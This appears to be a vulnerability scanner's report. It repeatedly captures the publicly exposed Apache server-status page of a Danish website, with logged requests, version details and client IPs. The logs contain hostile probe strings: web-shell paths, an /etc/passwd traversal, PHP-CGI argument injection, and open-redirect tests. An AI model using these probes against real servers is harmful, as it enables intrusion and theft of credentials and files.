0.02183400.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-0-0/0/18. 0.03183400.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-0-0/0/18. 0.03183400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b18e0381
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 16-Nov-2024 19:24:13 CET Restart Time: Saturday, 16-Nov-2024 16:05:03 CET Parent Server Generation: 3 Server uptime: 3 hours 19 minutes 10 seconds Total accesses: 19542 - Total Traffic: 23.0 MB CPU Usage: u1.54 s.75 cu0 cs0 - .0192% CPU load 1.64 requests/sec - 2013 B/second - 1231 B/request 1 requests currently being processed, 30 idle workers ____._____________W_______.._......._____....................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-394180/36/540_ 0.02200.00.010.32 157.245.147.135webhotel5.webhosting.dkGET /css/radio.php HTTP/1.0 1-394040/37/494_ 0.03000.00.010.70 157.245.147.135webhotel5.webhosting.dkGET /ee.php HTTP/1.0 2-394190/36/546_ 0.03200.00.050.82 157.245.147.135webhotel5.webhosting.dkGET /images/wp-login.php HTTP/1.0 3-394200/36/545_ 0.03200.00.010.41 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/rest-api/orange.php HTTP/1.0 4-3-0/0/516. 0.0616000.00.000.40 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/Text/Diff/Engine/ HTTP/1.0 5-394210/36/524_ 0.03200.00.010.58 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/Text/3xrx.php HTTP/1.0 6-393670/38/548_ 0.04000.00.010.61 207.154.212.47webhotel5.webhosting.dkGET /about HTTP/1.0 7-393690/37/557_ 0.03400.00.010.57 157.245.147.135webhotel5.webhosting.dkGET /wp-admin/css/colors/ocean/lock0360.php HTTP/1.0 8-393720/37/532_ 0.03340.00.011.15 23.254.165.136webhotel5.webhosting.dkGET / HTTP/1.0 9-393700/37/550_ 0.03300.00.010.62 157.245.147.135webhotel5.webhosting.dkGET /wp-admin/images/thumbs.php HTTP/1.0 10-393730/37/548_ 0.03300.00.010.49 157.245.147.135webhotel5.webhosting.dkGET /css/4O4.php HTTP/1.0 11-393740/37/545_ 0.02300.00.010.38 157.245.147.135webhotel5.webhosting.dkGET /wxo.php HTTP/1.0 12-393750/37/554_ 0.03200.00.010.88 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/shell1.php HTTP/1.0 13-394050/37/554_ 0.03000.00.010.41 207.154.212.47webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 14-394060/37/550_ 0.03000.00.080.62 207.154.212.47webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 15-394070/37/508_ 0.03000.00.010.35 157.245.147.135webhotel5.webhosting.dkntent/themes/twentytwentytwo/inc/patterns/wp-login.php HTTP/1.0 16-394080/37/550_ 0.03000.00.010.42 207.154.212.47webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 17-394090/37/503_ 0.04000.00.010.59 207.154.212.47webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 18-394100/36/552W 0.03000.00.010.63 207.154.212.47webhotel5.webhosting.dkGET /server-status HTTP/1.0 19-394110/36/550_ 0.03400.00.011.01 23.254.165.136webhotel5.webhosting.dkGET /Wordpress/?page_id=9 HTTP/1.0 20-394220/36/502_ 0.03100.00.010.66 157.245.147.135webhotel5.webhosting.dkGET /css/wp-blog.php HTTP/1.0 21-394230/36/497_ 0.02100.00.011.38 157.245.147.135webhotel5.webhosting.dkGET /images/a.php HTTP/1.0 22-394240/36/453_ 0.03100.00.010.54 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/option-old.php HTTP/1.0 23-394250/36/446_ 0.03100.00.010.59 157.245.147.135webhotel5.webhosting.dkGET /uploads/mari.php HTTP/1.0 24-394260/36/451_ 0.03100.00.010.70 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/click.php HTTP/1.0 25-394270/36/439_ 0.03100.00.010.52 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/codeboy1877_up.php HTTP/1.0 26-3-0/0/401. 0.0616000.00.000.83 157.245.147.135webhotel5.webhosting.dkGET /wp-admin/css/colors/midnight/ HTTP/1.0 27-3-0/0/403. 0.0516020.00.000.49 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 28-394280/36/437_ 0.03000.00.011.18 157.245.147.135webhotel5.webhosting.dkGET /wp-content/plugin.php HTTP/1.0 29-3-0/0/403. 0.0516000.00.000.68 157.245.147.135webhotel5.webhosting.dkGET /xx.php HTTP/1.0 30-3-0/0/362. 0.0613000.00.000.66 157.245.147.135webhotel5.webhosting.dkGET /wp-content/themes/twentytwentyfour/assets/images/ HTTP/1.0 31-3-0/0/368. 0.0612700.00.000.57 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/blocks/archives/ HTTP/1.0 32-3-0/0/370. 0.0612900.00.000.59 157.245.147.135webhotel5.webhosting.dkGET /wp-content/themes/twentytwentythree/parts/ HTTP/1.0 33-3-0/0/351. 0.0610500.00.000.29 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/requests/src/transport/ HTTP/1.0 34-3-0/0/320. 0.05000.00.000.16 207.154.212.47webhotel5.webhosting.dkGET /server HTTP/1.0 35-3-0/0/323. 0.04000.00.000.19 207.154.212.47webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 36-394290/36/277_ 0.03000.00.010.16 157.245.147.135webhotel5.webhosting.dkGET /wp-cc.php HTTP/1.0 37-394300/36/234_ 0.02000.00.010.08 157.245.147.135webhotel5.webhosting.dkGET /images/offline.php HTTP/1.0 38-394310/36/216_ 0.03000.00.010.10 157.245.147.135webhotel5.webhosting.dkGET /wp-includes/js/jcrop/Jcrop.php HTTP/1.0 39-394320/36/180_ 0.03040.00.010.05 207.154.212.47webhotel5.webhosting.dkGET / HTTP/1.0 40-394330/35/183_ 0.03040.00.010.05 207.154.212.47webhotel5.webhosting.dkGET / HTTP/1.0 41-2-0/0/142. 0.04144500.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-2-0/0/148. 0.04144500.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-2-0/0/75. 0.04144500.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-2-0/0/76. 0.04144500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-2-0/0/75. 0.04144500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-2-0/0/73. 0.04144500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-2-0/0/73. 0.02144500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-2-0/0/77. 0.03144500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 49-2-0/0/80. 0.04144500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 50-2-0/0/29. 0.05144500.00.000.01 ::1webhotel5-64bit.webhosting.dk<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3caf1e891
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 14-Nov-2024 03:32:41 CET Restart Time: Thursday, 14-Nov-2024 03:00:08 CET Parent Server Generation: 0 Server uptime: 32 minutes 33 seconds Total accesses: 7781 - Total Traffic: 2.2 MB CPU Usage: u1.84 s.71 cu0 cs0 - .131% CPU load 3.98 requests/sec - 1207 B/second - 303 B/request 1 requests currently being processed, 32 idle workers ____________________________.___._W............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0456320/32/232_ 0.05200.00.030.09 157.250.160.11webhotel5.webhosting.dkGET / HTTP/1.0 1-0458430/32/229_ 0.05100.00.010.06 34.56.178.225webhotel5.webhosting.dkGET /wc.db HTTP/1.0 2-0457700/29/225_ 0.05400.00.010.08 34.56.178.225webhotel5.webhosting.dkGET /html.z HTTP/1.0 3-0458480/29/225_ 0.04230.00.010.06 172.68.23.172webhotel5.webhosting.dkGET /?find-new%2F2120050%2Fposts HTTP/1.0 4-0456950/32/228_ 0.05200.00.020.06 127.0.0.1webhotel5.webhosting.dk8be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.0 5-0458490/29/222_ 0.05100.00.010.06 34.56.178.225webhotel5.webhosting.dkGET /backup.z HTTP/1.0 6-0458590/30/225_ 0.04000.00.020.06 164.90.208.56webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 7-0520410/4/200_ 0.00000.00.000.05 164.90.208.56webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 8-0457350/30/176_ 0.03530.00.020.05 172.71.151.159webhotel5.webhosting.dkGET /?find-new%2F2115356%2Fposts HTTP/1.0 9-0457730/31/227_ 0.04200.00.010.06 34.56.178.225webhotel5.webhosting.dkGET /test.z HTTP/1.0 10-0457900/31/173_ 0.06030.00.020.05 164.90.208.56webhotel5.webhosting.dkGET / HTTP/1.0 11-0459590/29/226_ 0.06330.00.010.06 172.71.150.217webhotel5.webhosting.dkGET /?find-new%2F2116495%2Fposts HTTP/1.0 12-0465580/20/218_ 0.03300.00.010.07 34.56.178.225webhotel5.webhosting.dkGET /public.z HTTP/1.0 13-0457740/31/175_ 0.05100.00.010.05 34.56.178.225webhotel5.webhosting.dkGET /backup_1.z HTTP/1.0 14-0457790/31/181_ 0.06100.00.010.06 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-0457800/31/181_ 0.03000.00.020.05 34.56.178.225webhotel5.webhosting.dkGET /config/properties.ini HTTP/1.0 16-0465600/21/217_ 0.03400.00.010.06 34.56.178.225webhotel5.webhosting.dkGET /wwwroot.z HTTP/1.0 17-0458640/29/223_ 0.05500.00.010.06 34.56.178.225webhotel5.webhosting.dkGET /Vagrantfile HTTP/1.0 18-0457810/32/178_ 0.05130.00.020.05 172.71.146.80webhotel5.webhosting.dkGET /?find-new%2F2120142%2Fposts HTTP/1.0 19-0457910/32/179_ 0.07030.00.020.06 164.90.208.56webhotel5.webhosting.dkGET / HTTP/1.0 20-0458650/32/180_ 0.06000.00.020.05 164.90.208.56webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 21-0457820/30/178_ 0.05000.00.020.06 34.56.178.225webhotel5.webhosting.dkGET /redmine/config/configuration.yml HTTP/1.0 22-0457920/32/129_ 0.05000.00.010.04 164.90.208.56webhotel5.webhosting.dkGET /about HTTP/1.0 23-0458680/30/178_ 0.05500.00.010.08 34.56.178.225webhotel5.webhosting.dkGET /ROOT.z HTTP/1.0 24-0458690/30/226_ 0.04300.00.020.06 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-0457930/32/179_ 0.05000.00.010.05 164.90.208.56webhotel5.webhosting.dkGET /server HTTP/1.0 26-0465610/22/218_ 0.05330.00.020.06 162.158.42.91webhotel5.webhosting.dkGET /?find-new%2F2117231%2Fposts HTTP/1.0 27-0458700/30/220_ 0.05500.00.020.06 37.19.205.152webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 28-0-0/0/198. 0.0822000.00.000.05 34.56.178.225webhotel5.webhosting.dkGET /behat.yml HTTP/1.0 29-0457940/32/129_ 0.05000.00.020.04 164.90.208.56webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 30-0457950/32/181_ 0.06000.00.010.05 164.90.208.56webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 31-0458710/29/226_ 0.05400.00.010.06 127.0.0.1webhotel5.webhosting.dkearch&controller=../../../../../../../../etc/passwd%00 HTTP/1.0 32-0-0/0/147. 0.0923600.00.000.04 34.56.178.225webhotel5.webhosting.dkGET //www.sql HTTP/1.0 33-0457960/31/131_ 0.06630.00.020.04 172.71.147.118webhotel5.webhosting.dkGET /?find-new%2F2115098%2Fposts HTTP/1.0 34-0457970/30/228W 0.04000.00.010.06 164.90.208.56webhotel5.webhosting.dkGET /server-status HTTP/1.0 35-0-0/0/148. 0.0922860.00.000.03 172.71.151.135webhotel5.webhosting.dkGET /?find-new%2F2057666%2Fprofile-posts HTTP/1.0 36-0-0/0/99. 0.0581200.00.000.03 34.136.252.10webhotel5.webhosting.dkPOST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.0 37-0-0/0/99. 0.0824310.00.000.04 34.56.178.225webhotel5.webhosting.dkGET /mysql.initial.sql HTTP/1.0 38-0-0/0/100. 0.1124360.00.000.04 34.56.178.225webhotel5.webhosting.dkGET / HTTP/1.0 39-0-0/0/50. 0.05105600.00.000.01 34.136.252.10webhotel5.webhosting.dkson/guppy/v2/load-guppy-users?userId=1&offset=0&search HTTP/1.0 40-0-0/0/49. 0.06105300.00.000.01 35.222.52.234webhotel5.webhosting.dk1&admin_custom_language_return_url=https://interact.sh HTTP/1.0 41-0-0/0/50. 0.07105200.00.000.01 34.136.252.10webhotel5.webhosting.dkPOST /wp-admin/admin-ajax.php HTTP/1.0 42-0-0/0/49. 0.07105640.00.000.01 35.222.52.234webhotel5.webhosting.dkGET /?noptin_ns=email_click&to=https://interact.sh HTTP/1.0 43-0-0/0/49. 0.05105500.00.000.01 34.133.189.56webhotel5.webhosting.dkGET /conf/conf.war HTTP/1.0 44-0-0/0/50. 0.05105800.00.000.01 34.133.189.56webhotel5.webhosting.dkGET /sql.war HTTP/1.0 45-0-0/0/50. 0.05105600.00.000.01 95.108.213.220webhotel5.webhosting.dkGET /shop/93-sigurd-swane-1879-1973/ HTTP/1.0 46-0-0/0/50. 0.05105500.00.000.01 34.133.189.56webhotel5.webhosting.dkGET /old.war HTTP/1.0 47-0-0/0/50. 0.05105800.00.000.01 34.136.252.10webhotel5.webhosting.dk/uploads/workreap-temp/2ooyFo2Qr2vf017ZDT5jnhKAVlq.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transfe
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b4ef182d
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 12-Nov-2024 06:53:25 CET Restart Time: Tuesday, 12-Nov-2024 06:05:04 CET Parent Server Generation: 0 Server uptime: 48 minutes 21 seconds Total accesses: 3446 - Total Traffic: 1.4 MB CPU Usage: u.2 s.11 cu0 cs0 - .0107% CPU load 1.19 requests/sec - 505 B/second - 425 B/request 1 requests currently being processed, 35 idle workers ________W______________._____________........................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0619170/3/101_ 0.001900.00.000.02 20.27.24.20webhotel5.webhosting.dkHEAD /backup HTTP/1.0 1-0619190/3/103_ 0.001900.00.000.02 20.27.24.20webhotel5.webhosting.dkHEAD /new HTTP/1.0 2-0619200/3/101_ 0.00030.00.000.05 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 3-0619300/3/102_ 0.00000.00.000.03 139.59.136.184webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 4-0619310/3/102_ 0.00000.00.000.03 139.59.136.184webhotel5.webhosting.dkGET /about HTTP/1.0 5-0619320/3/102_ 0.00000.00.000.03 139.59.136.184webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 6-0632010/2/102_ 0.00000.00.000.03 139.59.136.184webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 7-0619330/3/103_ 0.00000.00.000.04 139.59.136.184webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 8-0619390/2/101W 0.00000.00.000.03 139.59.136.184webhotel5.webhosting.dkGET /server-status HTTP/1.0 9-0619400/2/101_ 0.002100.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /wp HTTP/1.0 10-0619410/2/102_ 0.002100.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 11-0619420/2/102_ 0.002130.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD / HTTP/1.0 12-0619430/2/101_ 0.002100.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /bc HTTP/1.0 13-0633160/1/101_ 0.002010.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /old HTTP/1.0 14-0633420/1/101_ 0.002000.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /wp HTTP/1.0 15-0633430/1/101_ 0.002000.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /new HTTP/1.0 16-0633960/1/101_ 0.001900.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /bc HTTP/1.0 17-0633980/1/101_ 0.001900.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /main HTTP/1.0 18-0633990/1/100_ 0.001910.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /bk HTTP/1.0 19-0634000/1/100_ 0.001900.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /home HTTP/1.0 20-0634410/1/101_ 0.001800.00.000.06 20.27.24.20webhotel5.webhosting.dkHEAD /main HTTP/1.0 21-0634420/1/101_ 0.001800.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD /home HTTP/1.0 22-0634430/1/101_ 0.001690.00.000.03 198.235.24.211webhotel5.webhosting.dkGET / HTTP/1.0 23-0-0/0/100. 0.062060.00.000.03 20.27.24.20webhotel5.webhosting.dkHEAD / HTTP/1.0 24-0634440/1/99_ 0.001660.00.000.35 198.235.24.211webhotel5.webhosting.dkGET / HTTP/1.0 25-0634450/1/100_ 0.001300.00.000.03 87.180.208.176webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 26-0634460/1/101_ 0.0012650.00.000.04 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 27-0546440/32/82_ 0.03040.00.010.03 139.59.136.184webhotel5.webhosting.dkGET / HTTP/1.0 28-0546520/32/82_ 0.051900.00.010.02 20.27.24.20webhotel5.webhosting.dkHEAD /old HTTP/1.0 29-0546670/32/82_ 0.041930.00.010.02 66.249.79.37webhotel5.webhosting.dkGET / HTTP/1.0 30-0546700/32/81_ 0.03000.00.010.02 139.59.136.184webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 31-0546710/32/82_ 0.04000.00.010.04 139.59.136.184webhotel5.webhosting.dkGET /server HTTP/1.0 32-0619440/2/52_ 0.002000.00.000.02 20.27.24.20webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 33-0619450/2/52_ 0.002000.00.000.05 20.27.24.20webhotel5.webhosting.dkHEAD /bk HTTP/1.0 34-0619460/2/52_ 0.002000.00.000.02 20.27.24.20webhotel5.webhosting.dkHEAD /backup HTTP/1.0 35-0634470/1/51_ 0.00900.00.000.01 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 36-0634480/1/50_ 0.00710.00.000.01 87.180.208.176webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 37-0-0/0/49. 0.068670.00.000.01 176.113.115.21webhotel5.webhosting.dkPOST / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3e95496d9
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 10-Nov-2024 21:53:51 CET Restart Time: Sunday, 10-Nov-2024 16:05:03 CET Parent Server Generation: 5 Server uptime: 5 hours 48 minutes 47 seconds Total accesses: 33231 - Total Traffic: 24.2 MB CPU Usage: u4.83 s1.35 cu0 cs0 - .0295% CPU load 1.59 requests/sec - 1211 B/second - 762 B/request 1 requests currently being processed, 31 idle workers ______________________W_________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5343480/48/968_ 0.11200.00.020.92 13.70.70.221webhotel5.webhosting.dkHEAD /new HTTP/1.0 1-5344590/47/961_ 0.11200.00.010.81 13.70.70.221webhotel5.webhosting.dkHEAD /main HTTP/1.0 2-5344600/48/960_ 0.12000.00.010.64 47.128.21.106webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 3-5345360/42/938_ 0.111230.00.010.99 81.19.232.86webhotel5.webhosting.dkGET /?find-new%2F2577213%2Fposts HTTP/1.0 4-5345710/47/949_ 0.111000.00.010.82 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-5345720/45/940_ 0.11400.00.010.41 13.70.70.221webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 6-5345740/48/949_ 0.124430.00.010.32 66.249.70.2webhotel5.webhosting.dkGET / HTTP/1.0 7-5345750/45/943_ 0.10420.00.010.38 13.70.70.221webhotel5.webhosting.dkHEAD / HTTP/1.0 8-5345760/45/940_ 0.10300.00.020.29 13.70.70.221webhotel5.webhosting.dkHEAD /bk HTTP/1.0 9-5345860/47/931_ 0.134710.00.010.28 66.249.70.8webhotel5.webhosting.dkGET / HTTP/1.0 10-5345770/47/935_ 0.13300.00.010.26 13.70.70.221webhotel5.webhosting.dkHEAD /backup HTTP/1.0 11-5345870/47/934_ 0.11400.00.020.33 13.70.70.221webhotel5.webhosting.dkHEAD /wp HTTP/1.0 12-5346070/45/935_ 0.11300.00.010.72 13.70.70.221webhotel5.webhosting.dkHEAD /old HTTP/1.0 13-5346110/47/948_ 0.14030.00.010.87 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 14-5346120/46/939_ 0.10200.00.010.37 13.70.70.221webhotel5.webhosting.dkHEAD /home HTTP/1.0 15-5346150/45/933_ 0.11030.00.010.39 81.19.232.86webhotel5.webhosting.dkGET / HTTP/1.0 16-5346160/45/926_ 0.11000.00.011.00 81.19.232.86webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 17-5346170/45/938_ 0.11000.00.010.91 81.19.232.86webhotel5.webhosting.dkGET /server HTTP/1.0 18-5346180/46/916_ 0.10000.00.010.30 81.19.232.86webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 19-5346200/45/852_ 0.10000.00.030.43 81.19.232.86webhotel5.webhosting.dkGET /about HTTP/1.0 20-5346210/46/916_ 0.13000.00.011.03 81.19.232.86webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 21-5346220/46/909_ 0.12000.00.010.40 81.19.232.86webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 22-5346230/43/910W 0.11000.00.011.05 81.19.232.86webhotel5.webhosting.dkGET /server-status HTTP/1.0 23-5346240/46/917_ 0.091360.00.010.50 81.19.232.86webhotel5.webhosting.dkGET /?find-new%2F2577120%2Fposts HTTP/1.0 24-5346250/46/909_ 0.121220.00.011.77 81.19.232.86webhotel5.webhosting.dkGET /?find-new%2F2577190%2Fposts HTTP/1.0 25-5346260/44/901_ 0.121130.00.010.86 81.19.232.86webhotel5.webhosting.dkGET /?find-new%2F2577325%2Fposts HTTP/1.0 26-5345830/46/726_ 0.11400.00.010.27 193.39.9.129webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 27-5346270/45/727_ 0.121200.00.010.40 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-5346430/44/725_ 0.121130.00.010.78 81.19.232.86webhotel5.webhosting.dkGET /?find-new%2F2577326%2Fposts HTTP/1.0 29-5347340/45/734_ 0.12000.00.010.50 81.19.232.86webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 30-5347620/43/677_ 0.111320.00.010.80 81.19.232.86webhotel5.webhosting.dkGET /?find-new%2F2576997%2Fposts HTTP/1.0 31-5393440/34/622_ 0.09300.00.010.24 13.70.70.221webhotel5.webhosting.dkHEAD /bc HTTP/1.0 32-5-0/0/585. 0.1269200.00.000.32 188.212.135.181webhotel5.webhosting.dkHEAD /config.js HTTP/1.0 33-5-0/0/568. 0.1170100.00.000.77 185.228.3.37webhotel5.webhosting.dkHEAD /backups/website.rar HTTP/1.0 34-5-0/0/553. 0.09666180.00.000.90 157.250.160.25www.discteknik.dkGET /Schnabel/Produktion/produktion.htm HTTP/1.0 35-5-0/0/457. 0.0869010.00.000.66 157.250.160.11webhotel5.webhosting.dkGET / HTTP/1.0 36-5-0/0/413. 0.1168900.00.000.58 127.0.0.1webhotel5.webhosting.dkGET /go/admin/pipelines/create?group=defaultGroup HTTP/1.0 37-4-0/0/325. 0.09376200.00.000.10 52.237.239.7webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 38-4-0/0/285. 0.08376250.00.000.09 52.237.239.7webhotel5.webhosting.dkHEAD / HTTP/1.0 39-4-0/0/204. 0.08376240.00.000.07 194.67.210.77webhotel5.webhosting.dkHEAD / HTTP/1.0 40-4-0/0/156. 0.09375800.00.000.07 193.32.127.238webhotel5.webhosting.dk/wp-content/themes/footysquare/include/lang_upload.php HTTP/1.0 41-4-0/0/109. 0.09376100.00.000.03 193.32.127.238webhotel5.webhosting.dkET /wp-content/themes/statfort/include/lang_upload.php HTTP/1.0 42-4-0/0/109. 0.08376100.00.000.03 52.237.239.7webhotel5.webhosting.dkHEAD /bk HTTP/1.0 43-4-0/0/111. 0.11376130.00.000.04 217.196.107.80webhotel5.webhosting.dkGET / HTTP/1.0 44-4-0/0/110. 0.09376100.00.000.03 52.237.239.7webhotel5.webhosting.dkHEAD /backup HTTP/1.0 45-4-0/0/109. 0.08376000.00.000.03 217.196.107.80webhotel5.webhosting.dkOST /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.0 46-4-0/0/62. 0.08376000.00.000.09 52.237.239.7webhotel5.webhosting.dkHEAD /old HTTP/1.0 47-4-0/0/50. 0.10376000.00.000.02 52.237.239.7webhotel5.webhosting.dkHEAD /new HTTP/1.0 48-4-0/0/48. 